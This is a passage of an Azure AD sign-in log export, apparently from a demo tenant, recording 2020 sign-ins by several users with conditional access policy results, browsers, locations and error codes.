'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",24b904d7-063a-4f4c-9637-40c79f4e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,24b904d7-063a-4f4c-9637-40c79f4e1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1051,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:29.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1f377d0-0835-4932-84de-2140113c6a3c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-104220b31400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6c1d2f35-9fdd-4afe-865b-104220b31400,SigninLogs,Sucess,41.90428925,-85.99833679
+1052,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:51.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cee373e3-2f7d-4c7a-879d-5902a9855db6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-10426bb61400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6c1d2f35-9fdd-4afe-865b-10426bb61400,SigninLogs,Sucess,41.90428925,-85.99833679
+1053,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:36.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,89ed6ca2-7537-4b81-805b-a6997dc2020b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",58101571-c323-4e3c-9694-0b1257fb1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,58101571-c323-4e3c-9694-0b1257fb1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1054,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:35.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cc0e83a3-7b0b-4f0b-b6f6-b15bea086a3a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,MCAS Conditional Access Application Control,36238d04-e66d-48fc-a73e-69b0d827d794,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",37105d23-9607-4aeb-a84b-5fa3719f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,37105d23-9607-4aeb-a84b-5fa3719f1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1055,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:30.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ccd469f-7038-0000-5421-79fcb5769fe0,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680df6091600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680df6091600,SigninLogs,Sucess,41.90428925,-85.99833679
+1056,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:44.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,81cd469f-e03d-0000-5421-7613fec53039,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",42ec543f-db91-4d87-b07f-74fd3c3a1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,42ec543f-db91-4d87-b07f-74fd3c3a1400,SigninLogs,Failed,41.90428925,-85.99833679
+1057,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:29.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,70764452-b957-474d-89f4-908f2e6c1a4e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34a4214f-a676-41f3-9bb4-26fa41941200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,34a4214f-a676-41f3-9bb4-26fa41941200,SigninLogs,Sucess,33.7984581,-84.38828278
+1058,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,a45ae61e-b3cc-49a3-8281-f830d87ae137,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",48cf7de2-e659-4e20-aee0-25dc58dc1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,48cf7de2-e659-4e20-aee0-25dc58dc1400,SigninLogs,Failed,33.7984581,-84.38828278
+1059,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:55.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0ecd469f-40d9-0000-5683-46dd031b9ad5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 